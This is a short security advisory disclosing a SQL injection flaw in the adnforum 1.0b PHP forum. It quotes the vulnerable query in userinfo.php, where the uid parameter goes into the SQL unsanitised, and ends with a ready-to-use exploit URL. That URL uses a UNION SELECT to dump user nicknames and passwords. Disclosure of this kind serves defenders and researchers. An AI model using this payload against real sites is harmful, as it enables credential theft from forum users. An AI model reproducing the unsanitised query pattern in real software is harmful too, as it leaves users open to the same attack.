-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
adnforum <= 1.0b / Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: adnforum
$ Version: <= 1.0b
$ File affected: userinfo.php
$ Download: http://sourceforge.net/projects/adnforum/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

Code:

2:   if (!isset($uid)){
3:	echo"error";
4:	exit();
5:   }else{
6:   include "header.php";
7:   $result = mysql_query("SELECT * FROM ".$prefijo."_usuarios where id = '$uid'", $conexion);
8:   $row = mysql_fetch_row($result);
     ....

Default $prefijo is: adn

Exploit:

http://site/userinfo.php?prefijo=adn&uid=' union select 1,concat(nick,0x3a,password),1,1,1,1,1,1